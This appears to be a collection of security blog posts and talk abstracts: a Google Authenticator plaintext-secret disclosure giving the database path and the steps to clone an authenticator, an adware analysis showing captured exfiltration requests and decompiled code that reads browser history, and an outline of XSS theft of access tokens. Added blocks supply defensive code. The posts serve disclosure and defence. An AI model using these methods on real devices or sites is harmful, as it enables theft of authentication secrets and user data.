[HITB GSEC] Understanding Your Opponent: Attack Profiling

This talk is based on real-world cases in Asia and Korea. We will discuss the approaches CERTs actually use for incident response and also present the common points and connections between different malware incidents in Asia.

Through various incident response and malware analysis engagements, we have found that attackers used similar malware and attack methods across several incidents. Analyzing the common points and relations between attacks helps us better understand the purpose and tactics of attackers and respond more effectively. Attack profiling is a valuable method for figuring out an attacker's motives, sharing threat intelligence about incidents, and preparing response methods for expected future incidents.

We have analyzed incidents targeting government agencies, media outlets, broadcasting services, critical infrastructure and the financial sector, and in this presentation we will introduce the approach and methods used for attack profiling.

Outline:

1. Recent Cases

2. Attack Profiling Methods and Factors for Analysis
– Approaches for Profiling
– Tactics, Code and IOC

3. Attack Profiling in Real World Incident Cases
– Case 1 : (Malware targeted to Financial Industry in Asia)
– Case 2 : (APT Incident Case 1)
– Case 3 : (APT Incident Case 2)

4. Conclusion

We hope that through this session, attendees will better understand how to analyze an attack and how to figure out its possible relations to other incidents.

Mobile Banking integrated with Apple Touch ID

Large-scale banks like Bank of America and Chase connected with Apple Pay. But banks in several countries did not work with Apple Pay directly; they integrated with Apple Touch ID instead, for example St George Bank (Australia), Tangerine (Canada) and Turkiye Bankasi (Turkey).

They only added fingerprint authentication via Touch ID, so customers can log in to mobile banking with their fingerprint instead of the traditional identification, password and PIN.

Banks can develop the fingerprint authentication using Apple's API, and the biometric data is stored on the customer's device.


Video : https://www.youtube.com/watch?v=VzLtxpSEAj4

Make a secure mobile payment – HITCON 2014

I gave a presentation at HITCON 2014 in Taiwan; the title is “Make a secure mobile payment”.

File : E2_06_Yongjun Park – Make a secure mobile payment

[Agenda]

Recently, many kinds of mobile payment have launched, and they have gained a large share of payment transactions worldwide. As we know, a breach of a payment system is highly dangerous because it could be exploited to steal real money directly.

I have found diverse flaws and vulnerabilities during security testing. Some of them could be used to acquire payment data and to change transactions. I will talk about the threats to mobile payment and cases of vulnerabilities. Also, I am going to share how to test the security of mobile payment.

[Google Authenticator] Account and Key plaintexts stored in a file

[Google Authenticator] Account and Key plaintexts are stored in a file (May 22, 2012)

I found a security issue in the Google Authenticator in May 2012. I sent a paper with the details of the issue to the Google security team, but I didn't get a response from them. The authenticator was upgraded last year; however, I have no idea whether or not the issue was changed. Anyway, I post it before it gets dumped to the back of my memory.

Google provides 2-step verification to make its services more secure. A user can install and use Google's OTP (One Time Password) app on their smartphone. But when I analyzed the authenticator on Android, I found a security issue that can be used to make a clone authenticator on another smartphone.

When a user registers their smartphone to use the authenticator, the user has to input their account and key, or scan a QR code. Then the authenticator starts creating one-time passwords, and the user can authenticate to Google services with a one-time credential.

< Add account >

The authenticator offers two ways to be initialized: ‘Scan barcode’ and ‘Manually add account’. Whichever you choose, the account and key are stored in a file, and the problem is that the user account and key are stored in that file as plaintext.

The stored file is an sqlite database and its path is

“/data/data/com.google.android.apps.authenticatior2/database/database”

As you can see below, the email field is the user account and the secret field is the key for the authenticator. The secret looks encrypted, but that does not prevent making a clone authenticator.

< An example of stored key and secret >

If the file is copied, or the account and secret are entered into another smartphone's authenticator, we have a clone authenticator. The duplicated authenticators create the same one-time password at the same time, and it can be used to authenticate to Google's services.

I checked whether the authenticator verifies the device by phone number, serial or IMEI, but device verification is not applied, so it does not affect the authenticator.

< The clone OTP >

Suggestions for this issue:

  1. Encrypt the account and key files
  2. Verify the device when the app executes, to check whether it is a valid device, or include the device serial in the one-time password creation process
  3. Use a more secure space such as the SIM or TrustZone to prevent malicious access (in Korea, OTP apps for banks and the financial sector are stored and executed in the SIM card)

User Activities Leakage with Free App

This free Android app transfers the device conditions and user activities without the user's agreement. An adware module included in the free app collects the internet access data and launched-app history on the device where it is installed.

Free app: National Call Taxi – 전국 콜텍시(Korean)
Google Play: https://play.google.com/store/apps/details?id=kr.baccharis.callTaxi

The names of launched apps and the list of accessed URLs are sent to an outside server whenever the user executes an app or connects to the web with a mobile browser while the ‘National Call Taxi’ app is running or in the background. The malicious code is NOT part of the app's main source; it is included in the app's for-profit adware module.

The transmitted data includes the accessed URL, access time, rooting status, WiFi status and a device serial number (not a real device UUID, but a randomly generated one).

[Sending Packet (URL Access)]

POST /servlet/Navvy.mawrite3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)
Host: ma01.mediachannel.co.kr
Connection: Keep-Alive
Accept-Encoding: gzip

ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=web&ldt=20130418162111&nsf=23554400003&wifi=wifi&rooting=0&data=0
http://www.google.co.kr/029.50820130418162111

[Sending Packet (App Execution)]

POST /servlet/Navvy.mawrite3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)
Host: ma01.mediachannel.co.kr
Connection: Keep-Alive
Accept-Encoding: gzip

ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=app&ldt=20130418162138&nsf=811915200069&wifi=wifi&rooting=0&data=
0201304181620222013041816213876.0com.android.browserandroid

[Sent Information]

–  Malicious app version and name
–  Serial number (generated random UUID)
–  Type: app (app execution) or web (web access)
–  WiFi and rooting status
–  Executed app name or accessed URL

I have decompiled the malicious app and reviewed the code of the malicious functions.

[UUID Generation]

private String w()
{
    String str = "";
    try
    {
        // the "serial" field sent to the server is a random UUID, not a hardware identifier
        str = UUID.randomUUID().toString();
        new StringBuilder("CreateSerial : ").append(str).toString();
        b(str);
        label33: return str;
    }
    catch (Exception localException)
    {
        break label33;
    }
}

[Browser History Access]

unregisterReceiver(this.s);
stopSelf();
Intent localIntent = new Intent(this, revRankey.class);
localIntent.putExtra("appwebCollect", 4500);
localIntent.setAction("Action.Restart.MediaChannelService");
PendingIntent localPendingIntent = PendingIntent.getBroadcast(this, 0, localIntent, 0);
g.g.set(2, 10000L, localPendingIntent);    // schedules the service-restart intent
if (localObject4 == null)
    continue;
((Cursor)localObject4).close();
return;
// queries browser history rows whose date is newer than the stored timestamp g.i
Cursor localCursor1 = g.e.query(Browser.BOOKMARKS_URI, Browser.HISTORY_PROJECTION, "date > " + g.i, null, "date");
localObject4 = localCursor1;
break;
((Cursor)localObject4).moveToLast();
((Cursor)localObject4).getCount();
localObject5 = "";
if (!((Cursor)localObject4).isBeforeFirst())
    continue;
if (localObject1 == null)
    continue;
boolean bool1 = localObject1.contentEquals("0");
if (!bool1)
    break label509;
if (localObject4 == null)

Some adware collects user behaviour and internet access history data, and advertising companies extract value from that data for their marketing. I guess that the web access and app launch data of this malicious app would be used for a similar purpose. But the WiFi status and rooting condition could be used to break into the device. I already posted the issue on Facebook, warning that other apps that include this adware could be exposed to the same security issue.
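A defender-side example, added here and not part of the post: a small Python parser and detection rule for the beacon format captured above. The records are constructed from the two captures (host, path and form fields as shown; the two-line data tail run together and kept as an opaque string), plus one benign record to show that the rule keys on the collector fields rather than on the host name.

```python
from datetime import datetime
from urllib.parse import parse_qs

# Constructed records modelled on the two captures above. The third record is
# benign and is included to show the rule is field-based, not host-based.
SAMPLE_BEACONS = [
    {"host": "ma01.mediachannel.co.kr", "path": "/servlet/Navvy.mawrite3",
     "body": "ver=2.0.1&collectapp=kr.baccharis.callTaxi"
             "&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=web&ldt=20130418162111"
             "&nsf=23554400003&wifi=wifi&rooting=0&data=0http://www.google.co.kr/029.50820130418162111"},
    {"host": "ma01.mediachannel.co.kr", "path": "/servlet/Navvy.mawrite3",
     "body": "ver=2.0.1&collectapp=kr.baccharis.callTaxi"
             "&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=app&ldt=20130418162138"
             "&nsf=811915200069&wifi=wifi&rooting=0&data=0201304181620222013041816213876.0com.android.browserandroid"},
    {"host": "example.com", "path": "/api/ping", "body": "ver=1&status=ok"},
]

# Fields that together identify the collector beacon, whatever server it reports to.
COLLECTOR_FIELDS = frozenset({"collectapp", "serial", "ltype", "ldt", "data"})


def parse_beacon(body: str) -> dict:
    """Decode a form-encoded beacon body into a normalised record; `data` stays opaque."""
    raw = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    rec = dict(raw)
    if "ldt" in raw:
        # YYYYMMDDhhmmss as written by the device (device-local time)
        rec["ldt"] = datetime.strptime(raw["ldt"], "%Y%m%d%H%M%S")
    if "rooting" in raw:
        rec["rooted"] = raw["rooting"] != "0"
    return rec


def is_collector_beacon(body: str) -> bool:
    """True when the body carries the full collector field set (host-agnostic rule)."""
    return COLLECTOR_FIELDS <= set(parse_qs(body, keep_blank_values=True))


def leaked_categories(rec: dict) -> list:
    """What a single beacon discloses, for an analyst summary."""
    cats = []
    if rec.get("ltype") == "web":
        cats.append("visited URL")
    elif rec.get("ltype") == "app":
        cats.append("launched app")
    if "rooted" in rec:
        cats.append("rooting status")
    if "wifi" in rec:
        cats.append("wifi status")
    if "serial" in rec:
        cats.append("persistent tracking id (random UUID)")
    return cats


def scan(beacons: list) -> list:
    """Indexes of requests matching the collector rule, e.g. over a proxy or pcap export."""
    return [i for i, b in enumerate(beacons) if is_collector_beacon(b["body"])]


if __name__ == "__main__":
    for i in scan(SAMPLE_BEACONS):
        rec = parse_beacon(SAMPLE_BEACONS[i]["body"])
        print(SAMPLE_BEACONS[i]["host"], rec["collectapp"], rec["ldt"], leaked_categories(rec))
```

Keying the rule on the field set rather than on ma01.mediachannel.co.kr means a renamed collection server or a second app carrying the same adware module still matches; the serial is worth logging because, random or not, it is stable per install and links every beacon from one device.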

South Korea Cyberterror on March 20th – News –

***Updated on March 26th***

[English]

South Korean Attack & Malware Analysis
http://www.infosecisland.com/blogview/23032-South-Korean-Attack-amp-Malware-Analysis.html

South Korean Banks, Media Companies Targeted by Destructive Malware
http://blogs.mcafee.com/mcafee-labs/south-korean-banks-media-companies-targeted-by-destructive-malware

[Korean]

Wowhacker Report

http://wowhacker.org/files/0320_cyberterror_stolenbyte.pdf

NProtect Report
http://erteam.nprotect.com/408

Ahnlab
http://asec.ahnlab.com/926

Each report is continually being updated; the Korean reports have more detailed and accurate information. I'll keep updating.

XSS using Facebook, Twitter open API – Addition

In the previous post, XSS using Facebook, Twitter open API, I mentioned that open APIs could be used for XSS on a consumer's web page. But some people misunderstood it and asked about it: it does not work on Facebook's pages, it works on a consumer's page developed with the open API. I posted it to show a bad case of open API usage and to demonstrate that it can be a threat to service providers and users.

And the APIs are not completely open to XSS: service providers have adopted a permission model that separates each feature by permission. A user needs to confirm the permission grant on first access to each feature, such as login, feed, like and others. (http://developers.facebook.com/docs/reference/login/#permissions)

API Permission of Facebook
API Permission of Yahoo App

But if the user has already granted the permissions for the features the attacker wants to use, there is no permission prompt. So this status and other information are needed to build a payload; it is similar to developing an app with the API.

I gave Facebook APIs as the example, but other service providers have adopted similar API structures and features. The effect of the XSS depends on the consumer's circumstances, but it can be a threat in some environments. The key factor is that many consumers' pages are not secured against XSS. They should audit their pages, hide the app secret and only grant the minimum permissions.

XSS using Facebook, Twitter open API

Many SNS, app and online service providers open APIs that expose features of their services and can be used to expand their business area. Service providers publish extensive documentation and samples for developers on various platforms: web, app and mobile.

For example, Facebook provides APIs that can be applied on Android, iOS and the web and implemented in PHP, JavaScript and other languages. A developer can use them to connect a login feature with Facebook, feed messages, or apply payments in their app.

But some APIs can be maliciously used through the developer's (consumer's) services. If a developer implements a feature using an open API, the API provider's data and functions may be controlled via the developer's actions. So API providers only permit their resources to registered developers to limit the threat. But registered does not mean secure: even if a developer has no intention of attacking the API and the provider's data, the developer's app could have a vulnerability that allows manipulating them. Twitter, Facebook, Google and other large-scale service providers routinely perform security review and testing of their services. However, API consumers such as web service providers, app developers and individuals do not have enough resources or consideration for a secure service.

Some APIs handle users' credentials, profiles and other information. For example, the Facebook login API lets the developer's application use Facebook authorization: the application can log in via the Facebook credential and use the user's Facebook information for its own services.

If the developer's application has an XSS vulnerability, the attacker can inject a crafted payload and steal credentials such as the access token via the boards or pages. The attacker can then manipulate Facebook features using the victim's access token, such as collecting the user's profile and spreading malicious feeds.

This is my demonstration of XSS using the Facebook open API. XSS on a consumer's web page that uses the Login API can be used to steal the access_token. The XSS payload steals the user's access_token on the consumer's web page, and the attacker is then able to post a feed message via the stolen access_token.

1. The attacker injects the XSS payload into a post on the consumer's website.

2. The victim reads the post with the XSS payload, and the payload sends the user's access_token to the attacker's server.

3. The attacker feeds a message to the user's Facebook.

I will not mention the details of the payload and tool, but if you read the API documents and have experience with API development, you can understand it easily.
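An added example covering this post and the "Addition" above (it is not the author's demonstration code, which the posts deliberately omit): the three mitigations the posts name, output escaping of user content, keeping the app secret server-side, and least-privilege permission requests, shown as a vulnerable render function beside its hardened form in Python. The config values, the minimum scope set and the permission names are constructed for illustration and are not tied to any specific API version.

```python
import html
from urllib.parse import urlencode

# Constructed: the permissions this hypothetical consumer app genuinely needs.
# Permission names are illustrative; the real set depends on the provider and API version.
MINIMUM_SCOPES = frozenset({"public_profile", "email"})

# Constructed server-side config. Only the app id may ever reach the browser;
# the app secret is a placeholder and must stay on the server.
SERVER_CONFIG = {
    "app_id": "000000000000000",
    "app_secret": "PLACEHOLDER-APP-SECRET",
    "redirect_uri": "https://consumer.example/fb/callback",
}


def render_post_unsafe(author: str, body: str) -> str:
    """The vulnerable pattern: user-controlled text concatenated straight into HTML,
    so a post body containing markup or script runs in every reader's browser."""
    return "<div class='post'><b>%s</b><p>%s</p></div>" % (author, body)


def render_post_safe(author: str, body: str) -> str:
    """Hardened form: every user-controlled value is HTML-escaped for element content."""
    return "<div class='post'><b>%s</b><p>%s</p></div>" % (
        html.escape(author, quote=True), html.escape(body, quote=True))


def client_config(server_config: dict) -> dict:
    """The subset of config safe to embed in page JavaScript: never the app secret."""
    return {k: v for k, v in server_config.items() if k != "app_secret"}


def excess_scopes(requested) -> list:
    """Permissions requested beyond the minimum the app needs (empty list means OK)."""
    return sorted(set(requested) - MINIMUM_SCOPES)


def login_query(server_config: dict, requested) -> str:
    """Query string for the provider's login dialog, built only from public values and
    refused outright if it would ask the user for more than the minimum permissions."""
    extra = excess_scopes(requested)
    if extra:
        raise ValueError("refusing to request permissions beyond the minimum: %s" % extra)
    return urlencode({
        "client_id": server_config["app_id"],
        "redirect_uri": server_config["redirect_uri"],
        "scope": ",".join(sorted(requested)),
    })


if __name__ == "__main__":
    sample = "<script>alert(1)</script>"  # constructed test string, not a real payload
    print(render_post_unsafe("bob", sample))
    print(render_post_safe("bob", sample))
    print(client_config(SERVER_CONFIG))
    print(login_query(SERVER_CONFIG, ["email"]))
```

Escaping in the render function is the control that removes the injection point; an access token stored in page JavaScript is only as safe as every rendering path on the page, so tokens are best kept server-side, and a least-privilege scope set limits what a stolen token could do in the first place.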

[Python] Example of sending a POST request via HTTPS

When you develop a tool to interact with an HTTPS server, sometimes you need code that can send a POST request via HTTPS. I was searching for the best example for my tool, but I couldn't find one. So I made the code by referencing a POST via HTTP example, and it works well. I post the sample code here.

>>> import httplib, urllib
>>> params = urllib.urlencode({'@number': 12524, '@type': 'issue', '@action': 'show'})
>>> headers = {"Content-type": "application/x-www-form-urlencoded",
...            "Accept": "text/plain",
...            "Other": "Header"}
>>> conn = httplib.HTTPSConnection("bugs.python.org") # HTTPSConnection instead of HTTPConnection
>>> conn.request("POST", "/", params, headers)       # second argument is the request path on the server
>>> response = conn.getresponse()
>>> print response.status, response.reason
>>> data = response.read()
>>> print data
>>> conn.close()
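An added Python 3 counterpart to the sample above (not from the post): http.client.HTTPSConnection with an ssl.create_default_context(), so the server certificate is checked against the system CA store and the hostname is verified, which Python 2's httplib did not do before 2.7.9. The connection_factory parameter is an assumption added so the function can be exercised offline without a live server.

```python
import http.client
import ssl
from urllib.parse import urlencode


def encode_form(fields: dict):
    """Form-encode the fields and build the matching headers (Content-Length included)."""
    body = urlencode(fields)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": str(len(body)),
        "Accept": "text/plain",
    }
    return body, headers


def verifying_context() -> ssl.SSLContext:
    """Default context: CERT_REQUIRED against the system trust store, hostname checking on."""
    return ssl.create_default_context()


def https_post(host: str, path: str, fields: dict, timeout: float = 10.0,
               connection_factory=None):
    """POST form fields over HTTPS and return (status, reason, body_bytes).

    connection_factory is an assumption for this example: anything with the
    HTTPSConnection(host, timeout=..., context=...) shape, used for offline tests."""
    body, headers = encode_form(fields)
    ctx = verifying_context()
    factory = connection_factory or http.client.HTTPSConnection
    conn = factory(host, timeout=timeout, context=ctx)
    try:
        conn.request("POST", path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.reason, resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    # Live call, same target as the sample above; needs network access.
    status, reason, data = https_post(
        "bugs.python.org", "/", {"@number": 12524, "@type": "issue", "@action": "show"})
    print(status, reason)
    print(data[:200])
```

Passing context=ssl.create_default_context() is the part that matters for a security tool: without it an older interpreter would happily complete the TLS handshake with any certificate, and the POST body (credentials included) would go to whoever answers for the host.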